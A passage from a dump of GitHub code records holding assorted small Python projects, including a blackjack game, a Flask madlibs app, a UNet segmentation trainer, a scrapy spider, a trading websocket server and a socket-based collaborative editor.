dataset_classes\n\n","repo_name":"humorbeing/python_github","sub_path":"__OLD_CODE_STORAGE/attention_RL/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22655324253","text":"import random\nimport art\nprint(art.logo)\ncards = [11, 2, 3, 4, 5, 5, 7, 8, 9, 10]\n\n\ndef shri():\n m = []\n a = [random.choice(cards)]\n\n m.append(random.choice(cards))\n maggy = False\n while not maggy:\n\n m.append(random.choice(cards))\n\n print(f\"your cards {m} {sum(m)}\")\n print(f\"Computer card is{a}\")\n if input('enter \"y\" to get another card or \"n\"') == \"n\":\n maggy = True\n if 11 in m and sum(m) > 21:\n s = m.index(11)\n\n m[s] = 1\n\n maharshi = False\n while not maharshi:\n if 11 in a and sum(a) > 21:\n h = a.index(11)\n a[h] = 1\n\n if sum(a) < 17:\n a.append(random.choice(cards))\n else:\n maharshi = True\n\n print(f\"computer cards{a} {sum(a)}\")\n\n if sum(m) > 21 and sum(a) > 21 or sum(a) == sum(m):\n print(\"Draw\")\n elif sum(a) > 21:\n print(\"you win\")\n elif sum(m) > 21:\n print(\"you lose\")\n elif sum(m) > sum(a):\n print(\"you win\")\n else:\n print('you lose')\n if input(\"enter 'y' to play again 'n' to exit\") == 'y':\n shri()\n\n\nshri()\n","repo_name":"vsdeshinge/python","sub_path":"blackjack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38507609994","text":"\nimport numpy as np\nimport re\nimport pandas as pd\nimport sqlite3 as sql\n\nclass Access:\n def __init__(self, dbName):\n self.dbConn = sql.connect(dbName)\n self.cursor = self.dbConn.cursor()\n def __del__(self):\n self.dbConn.close()\n def extract(self):\n dataDf = pd.read_sql_query(\"SELECT * FROM `barcode`\", con = self.dbConn)\n return dataDf\nclass Store:\n def __init__(self, dbName):\n self.dbConn = sql.connect(dbName)\n self.cursor = self.dbConn.cursor()\n def store(self, data):\n dataDF = pd.DataFrame(data)\n try:\n dataDF.to_sql(\"barcode\", self.dbConn, if_exists='append', index = False)\n except ValueError as error:\n print(\"Failed to insert:\", error)\n self.dbConn.commit()\n def __del__(self):\n self.dbConn.close()\n\n\nif __name__ == \"__main__\":\n while True:\n barIn = \"false\"\n while not barIn.isnumeric():\n barIn = input()\n data = {\"barcode\" : [barIn]}\n\n store = Store(\"someDB.db\")\n store.store(data)\n\n extract = Access(\"someDB.db\")\n print(extract.extract())\n ","repo_name":"oycheng/Aggie-Reuse-Storefront","sub_path":"frontend/databaseAccess.py","file_name":"databaseAccess.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36691136242","text":"# Insert the following into Nuke's menu.py, e.g. the one on your server/global\n# one all artists refer to. For personal testing, your home folder's \n# .nuke/menu.py would be sufficient\n\n# ------------------------- BEGIN ----------------------------------------------\n# State the directory to the root folder of the pipeline system code repository\n# This will be error checked\npipelineSysDir = \"D:/PipelineSystem/\"\nif os.path.isdir(pipelineSysDir):\n os.sys.path.append(\"D:/PipelineSystem/\")\nelse:\n pathNotExistErrMsg = \"Pipeline System folder, {}, does not exist or \" \\\n \"currently unavailable\".format(pipelineSysDir)\n nuke.message(pathNotExistErrMsg)\n raise OSError(pathNotExistErrMsg)\n\n# Next import the nuke modules from the pipeline system, run tests if chosen\nimport ps_nuke\nif nuke.ask(\"Run tests?\"):\n ps_nuke.runUnitTests()\n\n# Then initialize the pipeline system for Nuke\nps_nuke.initialize()\n# --------------------------- END ----------------------------------------------\n","repo_name":"j0yu/TDD-for-CG","sub_path":"ps_nuke/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"66"} +{"seq_id":"35489206649","text":"#!/usr/bin/env python37\n# -*- coding:utf-8 -*-\n# author:Luqueli@wisers.com time:2021/9/7\n\nimport urllib.request\nimport pandas as pd\nfrom time import sleep\nimport os\n\n\ndef sheet_load(stock_num: list, sheet_type: str):\n for stock in stock_num:\n url = f'http://quotes.money.163.com/service/{sheet_type}_' + stock + '.html'\n while True:\n try:\n content = urllib.request.urlopen(url, timeout=2).read()\n # content = content.decode(\"gbk\").encode(\"utf-8\")\n file_path = './all_sheets/' + stock + '_' + f'{sheet_type}.csv'\n if not os.path.isfile(file_path):\n empty_df = pd.DataFrame()\n empty_df.to_csv(file_path)\n with open(file_path, 'wb') as f:\n f.write(content)\n print(stock + '_' + f'{sheet_type}' + \"更新完成\")\n sleep(1)\n break\n except Exception as e:\n if str(e) == 'HTTP Error 404: Not Found':\n break\n else:\n print(e)\n continue\n\n\nif __name__ == \"__main__\":\n stock_no = ['601012', '002027', '002304']\n for sheet_ty in ['lrb', 'xjllb', 'zcfzb']:\n sheet_load(stock_no, sheet_ty)\n","repo_name":"Luque0108/finance_report_project","sub_path":"data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17225868673","text":"def add1(a, b):\n result = a + b\n return result\n\n\nvalue = add1(1, 2)\nprint(\"add1()\", value)\n\n\n\n\ndef add2():\n result = 1 + 2\n return result\n\n\nvalue = add2()\nprint(\"add2()\", value)\n\n\n\n\n\ndef add3(a, b):\n result = a + b\n print(result)\n\n\nvalue = add3(3, 4)\nprint(\"add3()\", value) # 반환 값이 없으면 NONE\n\n\n\n\ndef add4():\n result = 3 + 6\n print(result)\n\nvalue = add4()\nprint(\"add4()\", value)","repo_name":"ikk5515/python_study","sub_path":"python1/week6/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36524375073","text":"def intersection(a, b):\n if a == b:\n print(a)\n else:\n a = a.next\n b = b.next\n return a\n\nclass Node(object):\n def __init__(self, val):\n self.val = val\n self.next = None\n\n def prettyPrint(self):\n c = self\n while c:\n print(c.val)\n c = c.next\n\nptrA = Node(1)\nptrA.next = Node(2)\nptrA.next.next = Node(3)\nptrA.next.next.next = Node(4)\nprint('*'*40)\nprint('This is linked list for A nodes')\nptrA.prettyPrint()\nptrB = Node(6)\nptrB.next = ptrA.next.next\nprint('*'*40)\nprint('This is the linked list for B nodes')\nptrB.prettyPrint()\n#for each object in a, print a.val\n\nprint('*'*40)\nptrTmpAroot = ptrA\nwhile ptrTmpAroot:\n print(ptrTmpAroot.val)\n ptrTmpBroot = ptrB\n while ptrTmpBroot:\n print(ptrTmpBroot.val)\n if ptrTmpAroot == ptrTmpBroot:\n print('The intersection is ',ptrTmpAroot.val)\n ptrTmpBroot = ptrTmpBroot.next\n ptrTmpAroot = ptrTmpAroot.next\n\n\n\n#c = intersection(a, b)\n#c.prettyPrint()\n","repo_name":"Thyagaraja9573/Projects","sub_path":"linkedlist/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"44119797343","text":"\"\"\"A madlib game that compliments its users.\"\"\"\n\nfrom random import choice\n\nfrom flask import Flask, render_template, request\n\n# \"__name__\" is a special Python variable for the name of the current module.\n# Flask wants to know this to know what any imported things are relative to.\napp = Flask(__name__)\n\nAWESOMENESS = [\n \"awesome\",\n \"terrific\",\n \"fantastic\",\n \"incredible\",\n \"wonderful\",\n \"smashing\",\n \"lovely\",\n]\n\n@app.route(\"/\")\ndef start_here():\n \"\"\"Display homepage.\"\"\"\n\n return render_template(\"gotohello.html\")\n\n\n@app.route(\"/hello\")\ndef say_hello():\n \"\"\"Say hello to user.\"\"\"\n\n return render_template(\"hello.html\")\n\n\n@app.route(\"/greet\")\ndef greet_person():\n \"\"\"Greet user with compliment.\"\"\"\n\n player = request.args.get(\"person\")\n\n compliment = choice(AWESOMENESS)\n # return render_template(\"compliment.html\", person=player, compliment=compliment)\n\n game_interest = request.args.get(\"game_interest\")\n\n if game_interest == \"on\":\n return render_template(\"game_form.html\")\n else:\n return render_template(\"goodbye.html\", person=player, compliment=compliment)\n\n@app.route(\"/game\")\ndef show_madlib_form():\n \"\"\"asks if wants to play game\"\"\"\n\n return render_template(\"game_form.html\")\n\n@app.route(\"/game_play\")\ndef show_madlib_result():\n\n color = request.args.get(\"color\")\n\n noun = request.args.get(\"noun\")\n\n person_madlib = request.args.get(\"person_madlib\")\n\n adjective = request.args.get(\"adjective\")\n\n animal = request.args.get(\"animal\")\n\n shape = request.args.get(\"shape\")\n\n sound = request.args.get(\"sound\")\n\n place = request.args.get(\"place\")\n \n return render_template(choice(['game.html', 'game1.html', 'game2.html']), color=color, noun=noun, person_madlib=person_madlib, adjective=adjective, animal=animal, shape=shape, sound=sound, place=place)\n\nif __name__ == \"__main__\":\n # Setting debug=True gives us error messages in the browser and also\n # \"reloads\" our web app if we change the code.\n\n app.run(debug=True, host=\"0.0.0.0\")\n","repo_name":"MegginS/Madlibs-11162021","sub_path":"madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28673513369","text":"\"\"\"CSV data formats\"\"\"\n\nfrom contextlib import contextmanager\nimport csv\nfrom dataclasses import dataclass\nfrom datetime import date, datetime\nfrom typing import ClassVar\nfrom parsedatetime import Calendar\nfrom .tabular import (TabularTypeParser, TabularDataClass, TabularCommand,\n TabularVatReturn, TabularVatSubmitCommand,\n tabulardataclass)\n\n__all__ = [\n 'CsvTypeParser',\n 'CsvDataClass',\n 'CsvVatReturn',\n 'CsvCommand',\n 'CsvVatSubmitCommand',\n]\n\n\n@dataclass\nclass CsvTypeParser(TabularTypeParser):\n \"\"\"CSV type parser\"\"\"\n\n calendar: ClassVar[Calendar] = Calendar()\n \"\"\"Calendar object used for date parsing\"\"\"\n\n def __post_init__(self):\n if self.parse is None:\n if issubclass(self.pytype, datetime):\n self.parse = self.parse_datetime\n elif issubclass(self.pytype, date):\n self.parse = self.parse_date\n super().__post_init__()\n\n @classmethod\n def parse_datetime(cls, value):\n \"\"\"Parse datetime from CSV value\"\"\"\n timestamp, ret = cls.calendar.parseDT(value)\n if not ret:\n raise ValueError(\"Invalid date: '%s'\" % value)\n return timestamp\n\n @classmethod\n def parse_date(cls, value):\n \"\"\"Parse date from CSV value\"\"\"\n return cls.parse_datetime(value).date()\n\n\nclass CsvDataClass(TabularDataClass):\n \"\"\"CSV data class\"\"\"\n\n TypeParser = CsvTypeParser\n\n\n@tabulardataclass\nclass CsvVatReturn(CsvDataClass, TabularVatReturn):\n \"\"\"VAT return from CSV data\"\"\"\n\n\nclass CsvCommand(TabularCommand):\n \"\"\"CSV file command\"\"\"\n\n @classmethod\n def init_parser(cls, parser):\n super().init_parser(parser)\n parser.add_argument('filename', help=\"CSV file\")\n\n @contextmanager\n def data(self):\n with open(self.args.filename, encoding='utf8') as f:\n yield csv.reader(f)\n\n\nclass CsvVatSubmitCommand(CsvCommand, TabularVatSubmitCommand):\n \"\"\"Submit VAT return(s) from CSV file\"\"\"\n\n Row = CsvVatReturn\n","repo_name":"mcb30/hmrc","sub_path":"hmrc/plugins/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"30867619869","text":"import torch\nfrom torchvision.transforms import transforms as T\nfrom unet import UNet\nfrom torch import optim\nfrom dataset import LiverDataset\nfrom torch.utils.data import DataLoader\n\n# 是否使用current cuda device or torch.device('cuda:0')\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nx_transform = T.Compose([\n T.ToTensor(),\n # 标准化至[-1,1],规定均值和标准差\n # torchvision.transforms.Normalize(mean, std, inplace=False)\n T.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n])\n# mask只需要转换为tensor\ny_transform = T.ToTensor()\n\n\ndef train_model(model, criterion, optimizer, dataload, num_epochs=20):\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n dataset_size = len(dataload.dataset)\n epoch_loss = 0\n step = 0 # minibatch数\n for x, y in dataload: # 分100次遍历数据集,每次遍历batch_size=4\n optimizer.zero_grad() # 每次minibatch都要将梯度(dw,db,...)清零\n inputs = x.to(device)\n labels = y.to(device)\n outputs = model(inputs) # 前向传播\n loss = criterion(outputs, labels) # 计算损失\n loss.backward() # 梯度下降,计算出梯度\n optimizer.step() # 更新参数一次:所有的优化器Optimizer都实现了step()方法来对所有的参数进行更新\n epoch_loss += loss.item() #loss.item()是为了取得一个元素张量的数值\n step += 1\n print(\"%d/%d,train_loss:%0.3f\" %\n (step, dataset_size // dataload.batch_size, loss.item()))\n print(\"epoch %d loss:%0.3f\" % (epoch, epoch_loss))\n # 保存模型参数\n torch.save(model.state_dict(), 'weights_%d.pth' % epoch)\n return model\n\n\n# 训练模型\ndef train():\n model = UNet(3, 1).to(device)\n batch_size = 4\n # 损失函数\n criterion = torch.nn.BCELoss()\n # 梯度下降\n # model.parameters():Returns an iterator over module parameters\n optimizer = optim.Adam(model.parameters())\n # 加载数据集\n liver_dataset = LiverDataset(\"data/train\",\n transform=x_transform,\n target_transform=y_transform)\n dataloader = DataLoader(liver_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=4)\n # DataLoader:该接口主要用来将自定义的数据读取接口的输出或者PyTorch已有的数据读取接口的输入按照batch size封装成Tensor\n # batch_size:how many samples per minibatch to load,这里为4,数据集大小400,所以一共有100个minibatch\n # shuffle:每个epoch将数据打乱,这里epoch=10。一般在训练数据中会采用\n # num_workers:表示通过多个进程来导入数据,可以加快数据导入速度\n train_model(model, criterion, optimizer, dataloader)\n\n\n# 测试\ndef test():\n model = UNet(3, 1)\n model.load_state_dict(\n torch.load(\n r\"/home/Wangling/MengLinzhi/LiverSegmentation/weights_19.pth\",\n map_location='cpu'))\n liver_dataset = LiverDataset(\"data/val\",\n transform=x_transform,\n target_transform=y_transform)\n dataloaders = DataLoader(liver_dataset) # batch_size默认为1\n model.eval()\n import matplotlib.pyplot as plt\n plt.ion()\n with torch.no_grad():\n for x, _ in dataloaders:\n y = model(x)\n img_y = torch.squeeze(y).numpy()\n plt.imshow(img_y)\n plt.pause(0.01)\n plt.show()\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"Wesley273/LiverSegmentation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28069323090","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom cnblog.items import *\nimport logging\n\n\nclass CnblogsSpider(scrapy.Spider):\n name = 'cnblogs'\n allowed_domains = ['www.cnblogs.com']\n blogurl = 'https://www.cnblogs.com/sitehome/p/{page}'\n\n def start_requests(self):\n yield scrapy.Request(url=self.blogurl.format(page=1), callback=self.parse, meta={'page': 1})\n\n def parse(self, response):\n logging.info('process:' + response.url)\n post_items = response.css('#post_list > .post_item')\n if post_items and len(post_items):\n for post_item in post_items:\n item = CnblogItem()\n item['title'] = post_item.css('div.post_item_body > h3 > a::text').extract_first().strip()\n item['author'] = post_item.css('div.post_item_body > div > a::text').extract_first().strip()\n item['release_time'] = ''.join(post_item.css('div.post_item_body > div::text').extract()).strip()\n item['comments'] = post_item.css(\n 'div.post_item_body > div > span.article_comment > a::text').extract_first().strip()\n item['view'] = post_item.css(\n 'div.post_item_body > div > span.article_view > a::text').extract_first().strip()\n item['summary'] = ''.join(post_item.css('div.post_item_body > p::text').extract()).strip()\n yield item\n if response.css('#paging_block > div > a:last-child::text').extract_first().strip() == 'Next >':\n page = response.meta.get('page') + 1\n yield scrapy.Request(url=self.blogurl.format(page=page), callback=self.parse, meta={'page': page})","repo_name":"lijinye/cnblog","sub_path":"cnblog/spiders/cnblogs.py","file_name":"cnblogs.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74546469649","text":"from fyers_api.Websocket import ws\nfrom fyers_api import fyersModel\n\nfrom pprint import pprint\nfrom flask import Flask, request\nimport threading\n\napp = Flask(__name__)\n\ntokenMapping = {}\nltpDict = {}\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World'\n\n\n@app.route('/ltp')\ndef get_ltp():\n global ltpDict\n print(ltpDict)\n ltp = -1\n instrument = request.args.get('instrument')\n try:\n ltp = ltpDict[instrument]\n except Exception as e:\n print(\"EXCEPTION occurred while getting ltpDict()\")\n print(e)\n return str(ltp)\n\n\ndef on_ticks(ticks):\n global ltpDict\n for tick in ticks:\n ltpDict[tick['symbol']] = tick['ltp']\n pprint(ltpDict)\n\n\ndef start_server():\n print(\"Inside startServer()\")\n app.run(host='0.0.0.0', port=4001)\n\n\ndef get_opt_instruments_list(fyers, symbol: str, expiry_str):\n strike_list = []\n instrument_list = []\n data = {\"symbols\": symbol}\n\n ltp = fyers.quotes(data=data)\n if ltp['code'] == 200:\n print(\"[Info] Last Trading Price: \", ltp['d'][0]['v'])\n\n strike = 0\n\n if ltp['code'] == 200 and ltp['d'][0]['s'] == 'ok':\n strike = ltp['d'][0]['v']['lp']\n else:\n raise ValueError(f\"[Err] {ltp['d'][0]['v']['code']} {ltp['d'][0]['v']['errmsg']}\")\n\n if ltp['code'] == '500':\n raise ConnectionError(ltp['data'])\n elif ltp['code'] == -15:\n raise ValueError(ltp['message'])\n elif ltp['code'] != 200:\n raise ValueError(ltp)\n\n if strike > 0:\n for i in range(-2, 2):\n strike = (int(strike / 100) + i) * 100\n strike_list.append(strike)\n if symbol == 'NSE:NIFTY50-INDEX':\n strike_list.append(strike + 50)\n\n print(\"[Info] STRIKE LIST: \", strike_list)\n\n # NSE:NIFTY2390719400CE\n\n if strike_list:\n mapper = {'NSE:NIFTY50-INDEX': \"NSE:NIFTY\", \"NSE:NIFTYBANK-INDEX\": 'NSE:BANKNIFTY'}\n for strike in strike_list:\n ltp_option = mapper[symbol] + expiry_str + str(strike)\n instrument_list.append(ltp_option + \"CE\")\n instrument_list.append(ltp_option + \"PE\")\n\n return instrument_list\n\n else:\n raise ValueError(\"[Error] Can't determine instrument list. Please check correct expiry.\")\n\n\ndef run_server(access_token: str, conf: object):\n app_id = getattr(conf, 'app_id', '')\n access_token = access_token\n fyers = fyersModel.FyersModel(token=access_token, is_async=False, client_id=app_id, log_path=\"./logs\")\n\n # Add Indexes 'NSE:NIFTYBANK-INDEX', 'NSE:NIFTY50-INDEX',\n index_list = ['NSE:NIFTY50-INDEX', 'NSE:NIFTYBANK-INDEX']\n instrument_list = []\n\n for index in index_list:\n expiry = conf.get_weekly_expiry(index)\n print(f\"[Info] Expiry for {index} :\", expiry)\n\n temp_inst_list = get_opt_instruments_list(fyers, index, expiry)\n instrument_list.extend(temp_inst_list)\n\n instrument_list.extend(getattr(conf, 'instruments', None))\n instrument_list.extend(index_list)\n\n print(\"[Info] BELOW IS THE COMPLETE INSTRUMENT LIST\", instrument_list)\n\n # END INPUT DATA\n t1 = threading.Thread(target=start_server)\n t1.start()\n\n access_token_websocket = app_id + '-100' + \":\" + access_token\n fs = ws.FyersSocket(access_token=access_token_websocket, run_background=False, log_path=\"./logs\")\n fs.websocket_data = on_ticks\n\n fs.subscribe(symbol=instrument_list, data_type=\"symbolData\")\n fs.keep_running()\n\n t1.join()\n print(\"websocket started !!\")\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"sanju918/fyers_algo","sub_path":"src/fyers_server.py","file_name":"fyers_server.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"789537846","text":"\r\nfrom DatabaseMgr.DatabaseMgr import *\r\n\r\nimport matplotlib.pyplot as plt\r\nimport argparse\r\n\r\nclass FeatureStatExtractor(DatabaseManager):\r\n\r\n def get_data(self, database_file, quantity):\r\n self.connect_db(database_file)\r\n \r\n # Get data\r\n statement = ('''select id, info, count(*) as freq from %s INNER JOIN %s ON %s = id group by %s ORDER BY count(*) DESC LIMIT :quantity''' \r\n % (self.get_relation_name(), self.get_table_name(), self.get_column_name(), self.get_column_name()))\r\n rows = self.search_db(statement, {'quantity':quantity})\r\n\r\n self.disconnect_db()\r\n\r\n return rows\r\n \r\n def get_relation_name(self):\r\n return self.relation_name\r\n\r\n def get_table_name(self):\r\n return self.table_name\r\n \r\n def get_column_name(self):\r\n return self.column_name\r\n\r\nclass PermissionStatExtractor(FeatureStatExtractor):\r\n\r\n relation_name = \"apk_permissions\"\r\n table_name = \"permissions\"\r\n column_name = \"permission\"\r\n\r\nclass FunctionalityStatExtractor(FeatureStatExtractor):\r\n\r\n relation_name = \"apk_functionalities\"\r\n table_name = \"functionalities\"\r\n column_name = \"functionality\"\r\n\r\ndef main():\r\n\r\n # Config argument parser\r\n argparser = argparse.ArgumentParser(description='Koodous dataset downloader')\r\n argparser.add_argument('--database-file', '-dbf', help = 'SQL3 database file location', required=True)\r\n argparser.add_argument('--quantity', '-q', help = 'Amount of values to show in the histogram', default = 10, type=int)\r\n argparser.add_argument('--feature-key', '-fk', help = 'Feature from which extract stats', required=True)\r\n \r\n # Parser arguments\r\n args = argparser.parse_args()\r\n database_file = args.database_file\r\n quantity = args.quantity\r\n feature_key = args.feature_key\r\n\r\n fse = None\r\n if feature_key == \"p\":\r\n fse = PermissionStatExtractor()\r\n elif feature_key == \"f\":\r\n fse = FunctionalityStatExtractor()\r\n else:\r\n argparser.error(\"Incorrect feature-key identifier\")\r\n \r\n rows = fse.get_data(database_file, quantity)\r\n\r\n x = [row['info'].split('.')[-1] for row in rows]\r\n y = [row['freq'] for row in rows] \r\n \r\n plt.hist(x, weights=y, bins=len(x))\r\n plt.show()\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"MartGon/MalwareClassifier","sub_path":"src/DatasetStatistics.py","file_name":"DatasetStatistics.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13397710476","text":"'''\n이취코테 p315 실전문제: 볼링공 고르기\n2019 SW 마에스트로 입학 테스트\n'''\nimport time\nimport itertools\n\nM, N = map(int, input().split())\nweights = list(map(int, input().split()))\n\nstart_time = time.time() #측정 시작\n\nweights.sort()\nprint(weights)\n\nresult = list(itertools.combinations(weights, 2))\n\nfor item in result:\n if item[0] == item[1]:\n result.remove(item)\n\nprint(len(result))\n\nprint(\"time :\", time.time() - start_time)","repo_name":"kss02281/Algorithm_Study","sub_path":"2022_Solved/2주차_Greedy/ch11_볼링공 고르기.py","file_name":"ch11_볼링공 고르기.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28754411961","text":"\"\"\"\nLos Diccionarios se basan en una llave y elementos.\nLa llave puede ser un string, un int, y los elementos pueden ser string, int, tuplas, listas u otros diccionarios\n\"\"\"\nages = {\n \"Dave\": 24,\n \"Mary\": 42,\n \"John\": 58\n}\nprint(ages[\"Mary\"])\n\ndatos = {\n 1:{\n 'name' : \"Dave\",\n 'age' : 24\n },\n 2: 'test',\n 3: [\"uno\",\"dos\",\"tres\"]\n}\nprint(datos[1]['age'])\nprint(datos[2])\nprint(datos[3][1])\n\n","repo_name":"sugofc/Sololearn","sub_path":"Python/dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8828909504","text":"import json\n\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\n\nfrom api.libs.utils.socket_communication import get_socket_group_name, fetch_workflow_comments, get_workflow_group_name\n\n\nclass WorkflowCommentConsumer(WebsocketConsumer):\n def connect(self):\n user = self.scope[\"user\"]\n workflow_id = self.scope.get(\"url_route\", {}).get(\"kwargs\", {}).get(\"workflow_id\")\n if user.is_anonymous:\n self.close()\n return\n\n group_name = get_workflow_group_name(workflow_id)\n\n async_to_sync(self.channel_layer.group_add)(\n group_name,\n self.channel_name\n )\n\n self.accept()\n\n workflow_comments = fetch_workflow_comments(workflow_id)\n return self.send(text_data=json.dumps(workflow_comments))\n\n def disconnect(self, close_code):\n self.close()\n\n def notify(self, payload):\n data = payload['data']\n return self.send(text_data=json.dumps(data))\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/workflows/consumers/comment_consumer.py","file_name":"comment_consumer.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3923707907","text":"class Solution():\n def compress(self, chars):\n size = len(chars)\n if size < 2:\n return size\n anchor, write = 0, 0\n for pos, char in enumerate(chars):\n if (pos + 1) == size or char != chars[pos+1]:\n chars[write] = char\n write += 1\n if pos > anchor:\n repeated_times = pos - anchor + 1\n for num in str(repeated_times):\n chars[write] = num\n write += 1\n anchor = pos + 1\n return write\n","repo_name":"Beki4Git/Competitive-programming","sub_path":"string_compression.py","file_name":"string_compression.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21539267099","text":"from socket import AF_INET, SOCK_STREAM, socket\nimport select\nimport datetime\nfrom collections import defaultdict\nimport traceback\nimport responses as rsp\n\nfile_dict = {} # contains files and their contents\n\nuser_dict = defaultdict(set) # contains users and their files\nonline_clients = {} #clients -> sockets\nopen_files = defaultdict(list) # filename: [user_sock1, ..]\n\n\nSOCKET_LIST = []\n\n\ndef get_message(sock):\n message = ''\n chunk = sock.recv(rsp.BUFFER_SIZE)\n message += chunk\n while len(chunk) > 0 and not chunk.endswith(rsp.SPACE_INVADER):\n chunk = sock.recv(rsp.BUFFER_SIZE)\n print('recvd CHUNK', chunk)\n message += chunk\n return message\n\n\ndef broadcast_file_list(server_socket, sock):\n print('Broadcasting')\n for client, socket in online_clients.items():\n print(client)\n # send the message only to peer\n if socket != server_socket and socket != sock:\n try:\n print('socket send, data>', [rsp._FILE_LIST, list(user_dict[client])])\n socket.send(rsp.make_response([rsp._FILE_LIST] + list(user_dict[client])))\n except:\n # broken socket connection\n socket.close()\n # broken socket, remove it\n remove_user_presence(sock)\n\n\ndef broadcast_text(server_socket, sock, filename):\n print('Broadcasting')\n print(filename)\n print(open_files[filename])\n for socket in open_files[filename]:\n print(open_files)\n # send the message only to peer\n if socket != server_socket and socket != sock:\n try:\n print('socket send, data>', [rsp._UPDATE_FILE, file_dict[filename]])\n socket.send(rsp.make_response([rsp._UPDATE_FILE, file_dict[filename]]))\n except:\n print('socket send error broadacst text')\n # broken socket connection\n traceback.print_exc() \n\n # broken socket, remove it\n remove_user_presence(sock)\n\n\ndef edit_file(args):\n \"\"\"\n Changes contents of the file\n args:\n -file name\n -file content\n \"\"\"\n file_dict[args[0]] = args[1]\n return rsp.make_response([rsp._RESP_OK])\n\n\ndef create_file(user_name):\n if file_dict.keys():\n max_nr = max(map(int, file_dict.keys())) + 1\n else:\n max_nr = 0\n file_dict[str(max_nr)] = ''\n user_dict[user_name].add(str(max_nr))\n print('File created, ', str(max_nr))\n return rsp.make_response([rsp._FILE_NAME, str(max_nr)])\n\n\ndef open_file(filename, sock):\n print('open_file, sock', sock, 'filename', filename)\n for file in open_files:\n print(file)\n if file != filename:\n try:\n print('open_files[file].remove(sock), sock:', sock)\n open_files[file].remove(sock)\n except Exception as e:\n pass\n\n open_files[filename] += [sock]\n print('open_files', open_files)\n return rsp.make_response([rsp._FILE_CONTENT, file_dict[filename]])\n\n\ndef get_perm(filename):\n user_list = []\n for u_name in user_dict.keys():\n if filename in user_dict[u_name]:\n user_list.append(u_name)\n print('User list', user_list)\n return rsp.make_response([rsp._PERM_LIST] + user_list)\n \n\ndef edit_permission(args):\n \"\"\"\n args - list of names.\n 1. filename\n 2-inf. usernames\n \"\"\"\n filename = args[0]\n userlist = args[1:]\n if rsp.SPACE_INVADER in userlist:\n userlist.remove(rsp.SPACE_INVADER)\n print ('Editing permissions for file', filename)\n print ('New user list', userlist)\n for u_name in user_dict.keys():\n if u_name in userlist:\n user_dict[u_name].add(filename)\n else:\n try:\n user_dict[u_name].remove(filename)\n except KeyError:\n continue\n # Also add permissions to users not yet seen by the server\n for u_name in userlist:\n if u_name not in user_dict:\n user_dict[u_name].add(filename)\n print (user_dict)\n\n\ndef remove_user_presence(sock):\n # Remove client from online clients\n for client, socket in online_clients.items():\n if socket == sock:\n del online_clients[client]\n # Remove client from list of users having a file open\n for filename, socket_list in open_files.items():\n if socket in socket_list:\n socket_list.remove(socket)\n # Remove client from SOCKET_LIST\n try:\n SOCKET_LIST.remove(sock)\n except ValueError:\n pass\n\n socket.close()\n\n\nimport time\nif __name__ == '__main__':\n print ('Running')\n s = socket(AF_INET, SOCK_STREAM)\n SOCKET_LIST.append(s)\n s.bind(('127.0.0.1', 7777))\n s.listen(1)\n print (\"Socket is bound to %s:%d\" % s.getsockname())\n print ('Socket %s:%d is in listening state' % s.getsockname())\n threads = []\n try:\n while 1:\n ready_to_read, ready_to_write, in_error = select.select(SOCKET_LIST,[],[],0)\n\n for sock in ready_to_read:\n # 